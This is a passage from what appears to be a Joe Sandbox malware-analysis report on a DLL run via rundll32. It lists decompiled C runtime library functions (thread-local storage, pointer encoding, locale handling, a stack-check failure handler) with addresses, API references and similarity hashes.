                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1597249276-0
                                                                                                                                • Opcode ID: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
                                                                                                                                • Instruction ID: 3ecf49368b379c7b2fc98199b5acc746d8241b5fc8f67adb79b354a7e716a565
                                                                                                                                • Opcode Fuzzy Hash: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
                                                                                                                                • Instruction Fuzzy Hash: D4A00269BD870031F860A6916C43F642101A790F81FE40050BB0C3C5C5B4C622584057
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10015810, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 310 10015810-1001581c TlsFree
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10015810() {
				long _t1;
				int _t2;

				_t1 =  *0x1001c454; // 0x1f
				_t2 = TlsFree(_t1); // executed
				return _t2;
			}





                                                                                                                                0x10015810
                                                                                                                                0x10015816
                                                                                                                                0x1001581c

                                                                                                                                APIs
                                                                                                                                • TlsFree.KERNEL32(0000001F), ref: 10015816
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3978063606-0
                                                                                                                                • Opcode ID: 97e76959ac37b7d4394a7cee687f5acc89a8cee38b46e02c5d733dee6e00d95b
                                                                                                                                • Instruction ID: fa98d0df67b1cb58bbb74f830cf95827f60a518a0a9fffd776344971974a895f
                                                                                                                                • Opcode Fuzzy Hash: 97e76959ac37b7d4394a7cee687f5acc89a8cee38b46e02c5d733dee6e00d95b
                                                                                                                                • Instruction Fuzzy Hash: A7A00271A04124DFEE01DBE5CEDCC26377CB74C342300D440F101C6221C639E404CB60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 1000C18E, Relevance: 1.5, APIs: 1, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 307 1000c18e-1000c190 call 1000c11c 309 1000c195-1000c196 307->309
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E1000C18E() {
				void* _t1;

				_t1 = E1000C11C(0); // executed
				return _t1;
			}




                                                                                                                                0x1000c190
                                                                                                                                0x1000c196

                                                                                                                                APIs
                                                                                                                                • __encode_pointer.LIBCMT ref: 1000C190
                                                                                                                                  • Part of subcall function 1000C11C: TlsGetValue.KERNEL32(00000000,?,1000C195,00000000,10013C0B,1001C808,00000000,00000314,?,1000C0A7,1001C808,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C12E
                                                                                                                                  • Part of subcall function 1000C11C: TlsGetValue.KERNEL32(00000005,?,1000C195,00000000,10013C0B,1001C808,00000000,00000314,?,1000C0A7,1001C808,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C145
                                                                                                                                  • Part of subcall function 1000C11C: RtlEncodePointer.NTDLL(00000000,?,1000C195,00000000,10013C0B,1001C808,00000000,00000314,?,1000C0A7,1001C808,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C183
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Value$EncodePointer__encode_pointer
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2585649348-0
                                                                                                                                • Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                • Instruction ID: 12430fc690a5cffd0a560911a9b8f9666f7ca482c5d37c04a4b642a89194bcd7
                                                                                                                                • Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 100109FC, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E100109FC(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E1000C727(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E1000C727(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E1000C727(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E1000C727(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E1000C727(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E1000C727(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E1000C727(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E1000C727(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E1000C727(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E1000C727(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E1000C727(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E1000C727(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E1000C727(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E1000C727(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E1000C727(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E1000C727(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E1000C727(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E1000C727(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E1000C727(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E1000C727(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E1000C727(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E1000C727(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E1000C727(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E1000C727(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E1000C727(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E1000C727(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E1000C727(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E1000C727(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E1000C727(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E1000C727(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E1000C727(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E1000C727(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E1000C727(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E1000C727(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E1000C727(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E1000C727(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E1000C727(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E1000C727(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E1000C727(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E1000C727(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E1000C727(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E1000C727(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E1000C727(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E1000C727(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                                                                                                                                0x10010a04
                                                                                                                                0x10010a08
                                                                                                                                0x10010a0c
                                                                                                                                0x10010a0f
                                                                                                                                0x10010a14
                                                                                                                                0x10010a1b
                                                                                                                                0x10010a21
                                                                                                                                0x10010a33
                                                                                                                                0x10010a48
                                                                                                                                0x10010a5d
                                                                                                                                0x10010a72
                                                                                                                                0x10010a8a
                                                                                                                                0x10010a9f
                                                                                                                                0x10010ab1
                                                                                                                                0x10010ac6
                                                                                                                                0x10010ade
                                                                                                                                0x10010af3
                                                                                                                                0x10010b08
                                                                                                                                0x10010b1d
                                                                                                                                0x10010b35
                                                                                                                                0x10010b4a
                                                                                                                                0x10010b5f
                                                                                                                                0x10010b74
                                                                                                                                0x10010b8c
                                                                                                                                0x10010ba1
                                                                                                                                0x10010bb6
                                                                                                                                0x10010bcb
                                                                                                                                0x10010be3
                                                                                                                                0x10010bf8
                                                                                                                                0x10010c0d
                                                                                                                                0x10010c22
                                                                                                                                0x10010c3a
                                                                                                                                0x10010c4f
                                                                                                                                0x10010c64
                                                                                                                                0x10010c79
                                                                                                                                0x10010c91
                                                                                                                                0x10010ca6
                                                                                                                                0x10010cbb
                                                                                                                                0x10010cd0
                                                                                                                                0x10010ceb
                                                                                                                                0x10010d03
                                                                                                                                0x10010d1b
                                                                                                                                0x10010d33
                                                                                                                                0x10010d4e
                                                                                                                                0x10010d66
                                                                                                                                0x10010d7e
                                                                                                                                0x10010d96
                                                                                                                                0x10010db1
                                                                                                                                0x10010dc9
                                                                                                                                0x10010de4
                                                                                                                                0x10010df7
                                                                                                                                0x10010e01
                                                                                                                                0x10010e0e
                                                                                                                                0x10010e16
                                                                                                                                0x10010a16
                                                                                                                                0x10010a1a
                                                                                                                                0x10010a1a

                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ___getlocaleinfo
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1937885557-0
                                                                                                                                • Opcode ID: d04f72e6812a02fed01aee00663be6446466a87147cf99734c158c6a74e1d766
                                                                                                                                • Instruction ID: 373a512ba0ef4fc8f422f1cc41f902c08c3998079d01379570979cb3c01b4451
                                                                                                                                • Opcode Fuzzy Hash: d04f72e6812a02fed01aee00663be6446466a87147cf99734c158c6a74e1d766
                                                                                                                                • Instruction Fuzzy Hash: 24E1BDB290021DBEFB15CBE1CD85DFF77BDEB14784F04092AB259E2041EA75AA059B60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10007528, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10007528(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1001b694; // 0x9a1487b
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1001cc48 = _t6;
				 *0x1001cc44 = _t22;
				 *0x1001cc40 = _t25;
				 *0x1001cc3c = _t21;
				 *0x1001cc38 = _t27;
				 *0x1001cc34 = _t26;
				 *0x1001cc60 = ss;
				 *0x1001cc54 = cs;
				 *0x1001cc30 = ds;
				 *0x1001cc2c = es;
				 *0x1001cc28 = fs;
				 *0x1001cc24 = gs;
				asm("pushfd");
				_pop( *0x1001cc58);
				 *0x1001cc4c =  *_t31;
				 *0x1001cc50 = _v0;
				 *0x1001cc5c =  &_a4;
				 *0x1001cb98 = 0x10001;
				_t11 =  *0x1001cc50; // 0x0
				 *0x1001cb4c = _t11;
				 *0x1001cb40 = 0xc0000409;
				 *0x1001cb44 = 1;
				_t12 =  *0x1001b694; // 0x9a1487b
				_v812 = _t12;
				_t13 =  *0x1001b698; // 0xf65eb784
				_v808 = _t13;
				 *0x1001cb90 = IsDebuggerPresent();
				_push(1);
				E1000CB48(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x100177f4);
				if( *0x1001cb90 == 0) {
					_push(1);
					E1000CB48(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                0x10007528
                                                                                                                                0x10007528
                                                                                                                                0x10007528
                                                                                                                                0x10007528
                                                                                                                                0x10007528
                                                                                                                                0x10007528
                                                                                                                                0x10007528
                                                                                                                                0x1000752e
                                                                                                                                0x10007530
                                                                                                                                0x10007530
                                                                                                                                0x1000cc77
                                                                                                                                0x1000cc7c
                                                                                                                                0x1000cc82
                                                                                                                                0x1000cc88
                                                                                                                                0x1000cc8e
                                                                                                                                0x1000cc94
                                                                                                                                0x1000cc9a
                                                                                                                                0x1000cca1
                                                                                                                                0x1000cca8
                                                                                                                                0x1000ccaf
                                                                                                                                0x1000ccb6
                                                                                                                                0x1000ccbd
                                                                                                                                0x1000ccc4
                                                                                                                                0x1000ccc5
                                                                                                                                0x1000ccce
                                                                                                                                0x1000ccd6
                                                                                                                                0x1000ccde
                                                                                                                                0x1000cce9
                                                                                                                                0x1000ccf3
                                                                                                                                0x1000ccf8
                                                                                                                                0x1000ccfd
                                                                                                                                0x1000cd07
                                                                                                                                0x1000cd11
                                                                                                                                0x1000cd16
                                                                                                                                0x1000cd1c
                                                                                                                                0x1000cd21
                                                                                                                                0x1000cd2d
                                                                                                                                0x1000cd32
                                                                                                                                0x1000cd34
                                                                                                                                0x1000cd3c
                                                                                                                                0x1000cd47
                                                                                                                                0x1000cd54
                                                                                                                                0x1000cd56
                                                                                                                                0x1000cd58
                                                                                                                                0x1000cd5d
                                                                                                                                0x1000cd71

                                                                                                                                APIs
                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 1000CD27
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000CD3C
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(100177F4), ref: 1000CD47
                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 1000CD63
                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 1000CD6A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2579439406-0
                                                                                                                                • Opcode ID: 43c0a73ece872da72226e27df5c53fcb575222ecc62e5e228e17eabb5ee57284
                                                                                                                                • Instruction ID: 559590bdb0648a0681ca8b86135b519941bf9d0b9bb10151d96a38d458c2f466
                                                                                                                                • Opcode Fuzzy Hash: 43c0a73ece872da72226e27df5c53fcb575222ecc62e5e228e17eabb5ee57284
                                                                                                                                • Instruction Fuzzy Hash: 4521A9B890526C9FF315DF28DDC6A457BA4FB08354F10D01AE90D86261EBB5E9808F85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10005DB5, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10005DB5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E10007B2B(E100155AB, __ebx, __edi, __esi);
				E10006121(_t44 - 0x14, 0);
				_t43 =  *0x1001c478; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E100049C5( *((intOrPtr*)(_t44 + 8)), E100048D1(0x1001c510));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E10005C33(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E10006AB2(_t44 - 0x20, "bad cast");
							E10006B9C(_t44 - 0x20, 0x10019754);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x1001c478 =  *((intOrPtr*)(_t44 - 0x10));
						E10004908( *((intOrPtr*)(_t44 - 0x10)));
						E100062C2(_t39, _t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E10006149(_t44 - 0x14);
				return E10007BCA(_t41);
			}








                                                                                                                                0x10005db5
                                                                                                                                0x10005dbc
                                                                                                                                0x10005dc6
                                                                                                                                0x10005dcb
                                                                                                                                0x10005dd1
                                                                                                                                0x10005dda
                                                                                                                                0x10005de6
                                                                                                                                0x10005deb
                                                                                                                                0x10005def
                                                                                                                                0x10005df3
                                                                                                                                0x10005df9
                                                                                                                                0x10005dff
                                                                                                                                0x10005e00
                                                                                                                                0x10005e07
                                                                                                                                0x10005e0a
                                                                                                                                0x10005e14
                                                                                                                                0x10005e22
                                                                                                                                0x10005e22
                                                                                                                                0x10005e27
                                                                                                                                0x10005e2c
                                                                                                                                0x10005e32
                                                                                                                                0x10005e38
                                                                                                                                0x10005df5
                                                                                                                                0x10005df5
                                                                                                                                0x10005df5
                                                                                                                                0x10005df3
                                                                                                                                0x10005e3e
                                                                                                                                0x10005e45
                                                                                                                                0x10005e51

                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 10005DBC
                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 10005DC6
                                                                                                                                • int.LIBCPMT ref: 10005DDD
                                                                                                                                  • Part of subcall function 100048D1: std::_Lockit::_Lockit.LIBCPMT ref: 100048E4
                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 10005DE6
                                                                                                                                • codecvt.LIBCPMT ref: 10005E00
                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 10005E14
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10005E22
                                                                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 10005E32
                                                                                                                                • std::locale::facet::facet_Register.LIBCPMT ref: 10005E38
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                • String ID: bad cast
                                                                                                                                • API String ID: 577375395-3145022300
                                                                                                                                • Opcode ID: 947826b3624ecf92965e771582af2f165e4d8cf4c9cf5e2f80eb09966ed06c83
                                                                                                                                • Instruction ID: 81edb92d4fe89b85e5fa49a9efe023e5a42689b3e2a849782fe7e0a22671cd13
                                                                                                                                • Opcode Fuzzy Hash: 947826b3624ecf92965e771582af2f165e4d8cf4c9cf5e2f80eb09966ed06c83
                                                                                                                                • Instruction Fuzzy Hash: 640100399002199BFB04DBA0CC52AEE7336EF443A0F214509E1106B1DADF38FA408750
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 10005B96, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 49COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 85%
                                                                                                                                			E10005B96(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t18;
				void* _t23;
				void* _t39;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E10007B2B(E100155AB, __ebx, __edi, __esi);
				E10006121(_t44 - 0x14, 0);
				_t43 =  *0x1001c474; // 0x4c42b00
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t18 = E100049C5( *((intOrPtr*)(_t44 + 8)), E100048D1(0x1001c58c));
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E10005797(__ebx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E10006AB2(_t44 - 0x20, "bad cast");
							E10006B9C(_t44 - 0x20, 0x10019754);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x1001c474 =  *((intOrPtr*)(_t44 - 0x10));
						E10004908( *((intOrPtr*)(_t44 - 0x10)));
						E100062C2(_t39, _t41, _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E10006149(_t44 - 0x14);
				return E10007BCA(_t41);
			}








                                                                                                                                0x10005b96
                                                                                                                                0x10005b9d
                                                                                                                                0x10005ba7
                                                                                                                                0x10005bac
                                                                                                                                0x10005bb2
                                                                                                                                0x10005bbb
                                                                                                                                0x10005bc7
                                                                                                                                0x10005bcc
                                                                                                                                0x10005bd0
                                                                                                                                0x10005bd4
                                                                                                                                0x10005bda
                                                                                                                                0x10005be0
                                                                                                                                0x10005be1
                                                                                                                                0x10005be8
                                                                                                                                0x10005beb
                                                                                                                                0x10005bf5
                                                                                                                                0x10005c03
                                                                                                                                0x10005c03
                                                                                                                                0x10005c08
                                                                                                                                0x10005c0d
                                                                                                                                0x10005c13
                                                                                                                                0x10005c19
                                                                                                                                0x10005bd6
                                                                                                                                0x10005bd6
                                                                                                                                0x10005bd6
                                                                                                                                0x10005bd4
                                                                                                                                0x10005c1f
                                                                                                                                0x10005c26
                                                                                                                                0x10005c32

                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 10005B9D
                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 10005BA7
                                                                                                                                • int.LIBCPMT ref: 10005BBE
                                                                                                                                  • Part of subcall function 100048D1: std::_Lockit::_Lockit.LIBCPMT ref: 100048E4
                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 10005BC7
                                                                                                                                • ctype.LIBCPMT ref: 10005BE1
                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 10005BF5
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10005C03
                                                                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 10005C13
                                                                                                                                • std::locale::facet::facet_Register.LIBCPMT ref: 10005C19
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp Download File
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                                • String ID: bad cast
                                                                                                                                • API String ID: 2535038987-3145022300
                                                                                                                                • Opcode ID: 1816dcfd00bc349030bf56c7733edbee8c3ccf0b53305d8e8004b0bedb9255de
                                                                                                                                • Instruction ID: 3b1dadb70a21d87053c8386d98094ff6d4f1cf2bc646d68969b6f1144a2338f9
